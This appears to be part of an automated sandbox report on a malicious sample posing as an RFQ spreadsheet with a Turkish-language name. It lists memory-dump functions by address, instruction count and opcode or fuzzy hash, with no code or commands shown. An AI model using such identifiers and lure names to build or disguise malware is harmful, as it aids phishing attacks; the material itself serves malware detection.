Source File: 0000000A.00000002.2761681055.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e50000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13f6a6b873e8428863f660431f06d5c0becd6ea983977f807ce7c68a64ca3f41
Instruction ID: cd413276dcb2c378727b133cb0175952bcc9e27a4e5baec84405ebd30ec972a3
Opcode Fuzzy Hash: 13f6a6b873e8428863f660431f06d5c0becd6ea983977f807ce7c68a64ca3f41
Instruction Fuzzy Hash: AA31B031680159EFCF01AF64E855AAF7BB2EB48304F509469FD1587340CB79CD61DBA1

Function 02E52790 Relevance: .1, Instructions: 88COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2761681055.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e50000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c5a1880419c3c8c329fc1bacd26c4e364a09237b0bf9b41a12d294737df33d7
Instruction ID: cb443405404d14b93fa087fb6ca0c0b7582b3474d5ed3bb7b2f3f6178031f0c3
Opcode Fuzzy Hash: 3c5a1880419c3c8c329fc1bacd26c4e364a09237b0bf9b41a12d294737df33d7
Instruction Fuzzy Hash: 13315770D45359CFCB01EFB9D4446EDBBF4FF4A200F0041AAC904A7255EB341954CBA2

Function 02E58380 Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2761681055.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e50000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa61bed55070b83f0b91e08241433efc9b7c7aad00cff75946f09f3560231141
Instruction ID: 3372eb92424e8f78ae50bd53a38013257c20f3c0a449eac457a3d1110d115983
Opcode Fuzzy Hash: fa61bed55070b83f0b91e08241433efc9b7c7aad00cff75946f09f3560231141
Instruction Fuzzy Hash: EC21B0313902208BDB14DA268454B7F229BAFC464DF14E439DC42CB7A9EB75CCC2E781

Function 02D2D005 Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2761067942.0000000002D2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D2D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2d2d000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01eb68dd5223e955f1146bea46547320a68add211b520c98e671b37240e82d5e
Instruction ID: 7b92d6d180849d5b3ce3592d4ed42293f58a413109e766929e78d0642ae0ece4
Opcode Fuzzy Hash: 01eb68dd5223e955f1146bea46547320a68add211b520c98e671b37240e82d5e
Instruction Fuzzy Hash: A031297514E7D49FC7038B24C9A0711BF71AB47214F2985DBD8898F2A7C63A980ACB62

Function 02E528F0 Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2761681055.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e50000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 08bc990b1a202ff2e3d99f55b09bb9c64299cb50e2791b5ea1c8a4c56cd9f7c6
Instruction ID: baab025f961a7d2c24b08cf900837d099cc12684fabea764095df846e932ac7e
Opcode Fuzzy Hash: 08bc990b1a202ff2e3d99f55b09bb9c64299cb50e2791b5ea1c8a4c56cd9f7c6
Instruction Fuzzy Hash: 42217175A00116DFCF14DF24C840AAE77A5EB9D264B14C159DD0AAB344DB36EE42CBD1

Function 02D1D554 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2760975084.0000000002D1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2d1d000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0c8996fdf0d78481b3342b585f88f48097176f5d1d64cb58fb1de8c358198f2
Instruction ID: a0b3a55440495d64c91ee09c76f825dfa8bbde19c69275cf7f304fd48d062fb3
Opcode Fuzzy Hash: e0c8996fdf0d78481b3342b585f88f48097176f5d1d64cb58fb1de8c358198f2
Instruction Fuzzy Hash: 47212871604344EFEB04DF14E9C0B16BF66FB88314F20C569E8490BB46C336D856CBA2

Function 02E56300 Relevance: .1, Instructions: 74COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2761681055.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e50000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7094d6161554dad455c3fd61ef85ba59311013affe8b3e248c03aff6a7b4d16e
Instruction ID: e974b9280d104d6940b9dfdb905e3d0c835de490db2f65ef8ede2c026ca7b290
Opcode Fuzzy Hash: 7094d6161554dad455c3fd61ef85ba59311013affe8b3e248c03aff6a7b4d16e
Instruction Fuzzy Hash: A52102317816219FC7149A2AD45892EB3AAEFC9759B449479EC16CB394CF31DC02CB80

Function 02D2D044 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2761067942.0000000002D2D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D2D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2d2d000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 32b6e5dc06393237af4e1c4357007302900fecf65a941a6802d129a8f92e9462
Instruction ID: f1989d03920c81719e1cc84e10aed174e39f4ec08c78751915bd6799c8f07e9c
Opcode Fuzzy Hash: 32b6e5dc06393237af4e1c4357007302900fecf65a941a6802d129a8f92e9462
Instruction Fuzzy Hash: D921F5756043049FDB14DF10DAC4B16BB66FB98718F30C56DE8494B352C776D84ACA62

Function 02E5AEF0 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2761681055.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e50000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 76200a940450a0ed03031974a34f8fe8316b575854c6a52c8a6e9d992b618224
Instruction ID: 78ec16d4568ef15887db94165eb42c3fdcde8851fdf6fe871265365279447c60
Opcode Fuzzy Hash: 76200a940450a0ed03031974a34f8fe8316b575854c6a52c8a6e9d992b618224
Instruction Fuzzy Hash: A321A132A902189FCB10CF55D884BADBBB6FF8C314F149569E915A7390DB71AC51CBA0

Function 02E55649 Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2761681055.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e50000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4155df9b604e538395e6d16faa79aebe29b8584e5e12d78830a4f7de1ce63e9d
Instruction ID: 0a620d70da3e0af26f4afae4791ecd59662433a600758cf986da404c8d4fe504
Opcode Fuzzy Hash: 4155df9b604e538395e6d16faa79aebe29b8584e5e12d78830a4f7de1ce63e9d
Instruction Fuzzy Hash: F6213131685198DFCB00EF24E449BAF3BA2EF49318F5094A9E8058B344CB78CD65DBA1

Function 02E54285 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2761681055.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e50000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 26ef4bc3db1acdb2a7323d60043726a28084ece24864747b96dbf6d6f229d03b
Instruction ID: 2bc225161a496f98bc791e257cbe3a874d313370ff28337deb2962be1c42f348
Opcode Fuzzy Hash: 26ef4bc3db1acdb2a7323d60043726a28084ece24864747b96dbf6d6f229d03b
Instruction Fuzzy Hash: 36319478E51219CFCB44EFA8E59489DBBF2FF49301B209069E81AAB364D735AD45CF40

Function 02E59761 Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2761681055.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e50000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8558505284eb920eaff6162b114b30016add3f408ce5fc790c891cddb57a440f
Instruction ID: 04bb762af98acc4c42b7f5d917be5b0a013efeaabc4a76ceaf9ec5986f249a47
Opcode Fuzzy Hash: 8558505284eb920eaff6162b114b30016add3f408ce5fc790c891cddb57a440f
Instruction Fuzzy Hash: A8219C30E41259DFDB04CFA1D590AEEBFB6EF48209F249469E805F6291DB34D941DF60

Function 02E5F312 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2761681055.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e50000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 792761f1fad641a224ec47a2a454341ae38551b76263a60703f76050ba52c80d
Instruction ID: f7fbf73924cd3d23a46e12f4d9cd7ee9f03ffc8ab7eed7a60f2af02677891d9d
Opcode Fuzzy Hash: 792761f1fad641a224ec47a2a454341ae38551b76263a60703f76050ba52c80d
Instruction Fuzzy Hash: 12217C70D00249DFEB14EFB8D55079EBFB2FF96300F10C5A9C445AB215E7385A068B81

Function 02E562F0 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2761681055.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e50000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 30fe19d3818b0846f0e51eb6eed285e5a362c2b273ad770f0e1013b384b4514a
Instruction ID: 9c3e75b0c101aeb8b8fac524f3873e6efd1bb92bb8594c284bd37f0874f62a72
Opcode Fuzzy Hash: 30fe19d3818b0846f0e51eb6eed285e5a362c2b273ad770f0e1013b384b4514a
Instruction Fuzzy Hash: 611136317855218FC7159B2AC46853E77AAFFC575934884BDE816CB360CF20CC02C790

Function 02E527F0 Relevance: .1, Instructions: 57COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2761681055.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e50000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c11250bb0e9d3131539497a3287f1da8793109f9a93e6b4f535ef95eccd86db3
Instruction ID: c079b031dde7f9fca4734186baf96cd9ead5c13985a2ba46723e124f8cf82947
Opcode Fuzzy Hash: c11250bb0e9d3131539497a3287f1da8793109f9a93e6b4f535ef95eccd86db3
Instruction Fuzzy Hash: 2021E0B4C4521ACFCB41EFA9D8445EEBBF4FF0A200F4055AAD805B2210EB341A99CFA1

Function 02D1D54F Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2760975084.0000000002D1D000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2d1d000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
Instruction ID: 4014c9e60ef047ea220b80e678e0c37aaaebc5760790c681549dfd0841df9f3a
Opcode Fuzzy Hash: e3062b24f5b0128947100ec6e500ced3c6d63245422b7ec3b5033f72fc324263
Instruction Fuzzy Hash: 8D11B176504284DFCB15CF14E5C4B16BF72FB84324F24C5A9D8490B656C33AD856CBA2

Function 02E5F320 Relevance: .1, Instructions: 54COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2761681055.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e50000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bcd7fd137bb1047ba2dc33e3082f4c6f5faa4e0645477c25772b9f5796d3498d
Instruction ID: dfe2e8f64194e1c89c7099c587cbf0102df1b9d87fa9a3d5f8598aa0ed170fdf
Opcode Fuzzy Hash: bcd7fd137bb1047ba2dc33e3082f4c6f5faa4e0645477c25772b9f5796d3498d
Instruction Fuzzy Hash: 1E111C70D00209DFEB54EFA9E540B9EBBF6FB85304F10C5A9C419AB354EB785E058B81

Function 02E55E98 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2761681055.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e50000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb38a2d075bd33cdbd080a389abf384991be7c79f090014d549e9cd2f48ab1b5
Instruction ID: 982d77fd17c858c38277a629d34d04d1fe0de638d8e45d8a7527836d53e37c58
Opcode Fuzzy Hash: cb38a2d075bd33cdbd080a389abf384991be7c79f090014d549e9cd2f48ab1b5
Instruction Fuzzy Hash: 8401B532A441646FCB029E59A8606AF3FA7DFC9350F18809AF945DB384DE318D16D7A1

Function 02E5ABE0 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2761681055.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e50000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bd8da22363492420bad24d8e96a9c273d7808f879d87de98df4ccbbb6015122d
Instruction ID: dbc3fc5184851b0e60feab89801b67ff8da578acbce68be4c63c91fa5346587b
Opcode Fuzzy Hash: bd8da22363492420bad24d8e96a9c273d7808f879d87de98df4ccbbb6015122d
Instruction Fuzzy Hash: 8BF0F6313906204B87159A2FA454A6AB6DEEFC8A5D345917AED09C7361EF21CC428380

Function 02E5E8E8 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2761681055.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e50000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9cc816a470aa014654859a22854fc3b9f0bafb5dfb093075c09ebac62f8e6deb
Instruction ID: ed7d64a4abc4ffac5a385a42ca01cf53430de3fd3832aedc2aed1e256521eb9b
Opcode Fuzzy Hash: 9cc816a470aa014654859a22854fc3b9f0bafb5dfb093075c09ebac62f8e6deb
Instruction Fuzzy Hash: 4E115B74D0424ADFCB01DFA4D8449AEBBB1FB4A300F4184A5E910A3351D7385E19CF91

Function 02E59D59 Relevance: .0, Instructions: 44COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2761681055.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e50000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c78ec7eda13d7185aecefc418d2d717b30a77087cc5128a9b8e52adc0bb76af2
Instruction ID: 128551e1859cd87284aeec2bd59f1581e60f02b2316cbf1d02f883a048605595
Opcode Fuzzy Hash: c78ec7eda13d7185aecefc418d2d717b30a77087cc5128a9b8e52adc0bb76af2
Instruction Fuzzy Hash: 3BF0A935340214AFDB085AA698545BB7BCBEFC8250B048465BD0AC7341DF71CC1197D0

Function 02E59C23 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2761681055.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e50000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab8ff88e5229be55c612ff8e62f6489c7431c62cae304d13221e7e62f087c287
Instruction ID: 27963c38af91d2bc8ea9951cd0e411fd436ab2ca0b907f6fdb13e3e1a000b01d
Opcode Fuzzy Hash: ab8ff88e5229be55c612ff8e62f6489c7431c62cae304d13221e7e62f087c287
Instruction Fuzzy Hash: E7F09032904294DFCF01CB69D884AEABFB5EF8A221F04C1A6E958C7251D3314955CB91

Function 02E528A3 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2761681055.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e50000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ebfc8243fa4e4e83a94138a4ae68064b712971a06655bfe877495ba68e4026d0
Instruction ID: 727ac1564a690c2d2cdaa4b907231cc207011759c2a5af378a2919264eaccfde
Opcode Fuzzy Hash: ebfc8243fa4e4e83a94138a4ae68064b712971a06655bfe877495ba68e4026d0
Instruction Fuzzy Hash: 3BE08636E65766CFC701EBE0EC440FEBB34AED6222B58865BC06577190EB312658C792

Function 02E56739 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2761681055.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e50000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1beead275dce40ab297e3dafbae904ea61342bdca66147b479b727e30d013cf5
Instruction ID: b894c28b57e7c2a4319dd38e2c74d27e499fdec27b8bd6de137187c121a5addd
Opcode Fuzzy Hash: 1beead275dce40ab297e3dafbae904ea61342bdca66147b479b727e30d013cf5
Instruction Fuzzy Hash: 21E08C3000C3E58FDB03AB74A8951643F3BEE92100B4489E1D0864E54ADE6C1C468763

Function 02E528B0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2761681055.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e50000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 45572f95e666cc3ca3dd79b7806867953f09b8f16b586d4fee1f1a3b6ce47dc1
Instruction ID: 95853cd4a34060b04074003491279439ef00b1d81410583e0b290ca678964f17
Opcode Fuzzy Hash: 45572f95e666cc3ca3dd79b7806867953f09b8f16b586d4fee1f1a3b6ce47dc1
Instruction Fuzzy Hash: 15D05B31D2022B97CB10E7A5DC044EFF738EED5262B504626D51537140FB712659C6E1

Function 02E5D6D4 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2761681055.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e50000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 642e076bdaa6c25fa4342735e23588bb117db5bff84adbcc84e430a7e1fd6989
Instruction ID: 1b77ae6f1e30b184ee2429371f9df90cd6de4eef4afac843366f005b0c7a6124
Opcode Fuzzy Hash: 642e076bdaa6c25fa4342735e23588bb117db5bff84adbcc84e430a7e1fd6989
Instruction Fuzzy Hash: F6D06735E8450DCBCF20DFA9E4984DCFBB1EF89322F10542AD929A3251D7305465CF11

Function 02E5AFAD Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2761681055.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e50000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 005d464e31fb8db28d10eaea72252a636fb0cfdcaaf6a9d8486c988462ea2340
Instruction ID: d8c443e10809283f01890ae0447d33ac33500002184345c2135fb05f724f228b
Opcode Fuzzy Hash: 005d464e31fb8db28d10eaea72252a636fb0cfdcaaf6a9d8486c988462ea2340
Instruction Fuzzy Hash: 3AD0673AB400089FCB04DF99E8409DDF776FB98321B448516EA15A3260C6319965DB60

Function 02E56748 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2761681055.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e50000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 75e3e8625112083e20fa86c9d81f281d8333ee0ac365fe6598b96bf2a707c061
Instruction ID: 51e5b66d14dae72c27ce92118c602b25f98c85fa26b9815778e405eac3d34a8b
Opcode Fuzzy Hash: 75e3e8625112083e20fa86c9d81f281d8333ee0ac365fe6598b96bf2a707c061
Instruction Fuzzy Hash: 20C012304443188FD641FB65FC45515372BFBD0605F409920D4061A64DDF7D5C854B95

Non-executed Functions

Function 06C30040 Relevance: .6, Instructions: 596COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2774579696.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c30000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4c6b0e32904b9b54839ea34c31179716ac297030ee651b1d1a7c4840539c3e5d
Instruction ID: f9c939de20ff9784b486d72eebf614aed8ab28f40da56243cd9c9951dfa8db9b
Opcode Fuzzy Hash: 4c6b0e32904b9b54839ea34c31179716ac297030ee651b1d1a7c4840539c3e5d
Instruction Fuzzy Hash: 99528B74E01228CFDB64DF69C884B9DBBB2BB89301F5085EAD809A7354DB359E85CF50

Function 02E5F631 Relevance: .3, Instructions: 277COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2761681055.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e50000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b3fd17ed90843a285a9f999f99eb2f5c63b943211b1b93bb58e98c5b6c8f3ab
Instruction ID: 1e3c15434030acecfe3e8478f7552ee25b9506ed7808dd993eed3bdd3b029e54
Opcode Fuzzy Hash: 1b3fd17ed90843a285a9f999f99eb2f5c63b943211b1b93bb58e98c5b6c8f3ab
Instruction Fuzzy Hash: CDC1BE74E01228CFDB54DFA5C884B9DBBB2EF89300F6080A9D809AB355DB359E85CF50

Function 02E5FA8F Relevance: .3, Instructions: 272COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2761681055.0000000002E50000.00000040.00000800.00020000.00000000.sdmp, Offset: 02E50000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_2e50000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 256bf9c2b4f1a36c851975e6d9dd94388895c865415fa665e4933386e7165176
Instruction ID: 4536b877de2b879253108e6a9c83e30cb9f438342d840c39521059f33e83c6ff
Opcode Fuzzy Hash: 256bf9c2b4f1a36c851975e6d9dd94388895c865415fa665e4933386e7165176
Instruction Fuzzy Hash: E5C1AC74E01228CFDB54DFA5C994B9DBBB2EF89300F6080A9D809AB355DB359E85CF50

Function 06C3E6B0 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2774579696.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c30000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 984b44439de3e9830dc697046ce14ccdacea2bf823a5fcf4f92f4079e58c58e0
Instruction ID: 7bbe46657bfe994c8cbafef1e26b5a1118468693096cd6e5aa293da5f6278b30
Opcode Fuzzy Hash: 984b44439de3e9830dc697046ce14ccdacea2bf823a5fcf4f92f4079e58c58e0
Instruction Fuzzy Hash: C0C1AD74E01228CFDB54DFA5C984B9DBBB2EF89300F5081AAD809AB354DB355E85DF50

Function 06C3E258 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2774579696.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c30000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5d66f62c24aa04fc74fb3d8402bd5ffc19c268fb955fd7835f1d9bc4c593ae74
Instruction ID: 8eb2947c1677b0c85afd670cd32429c7aefb64c670a85c2c659bfa69f80fc481
Opcode Fuzzy Hash: 5d66f62c24aa04fc74fb3d8402bd5ffc19c268fb955fd7835f1d9bc4c593ae74
Instruction Fuzzy Hash: 4DC19D74E01228CFDB54DFA5C984B9DBBB2EF89300F5081AAD809AB354DB355E85DF50

Function 06C3DE00 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2774579696.0000000006C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6c30000_TEKL#U0130F TALEP VE F#U0130YAT TEKL#U0130F#U0130 RFQ_xlsx.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b07cbd52da8ffe0009cb612345da16caf0f5dbec006965704171866e54ba9946
Instruction ID: 9d357dce45a922d55d8f4b2a61dfd62af36c059ec491790ab092068ed8f6ad58
Opcode Fuzzy Hash: b07cbd52da8ffe0009cb612345da16caf0f5dbec006965704171866e54ba9946
Instruction Fuzzy Hash: A0C1AD74E01228CFDB54DFA5C984B9DBBB2EF89300F5081AAD809AB354DB359E85DF50

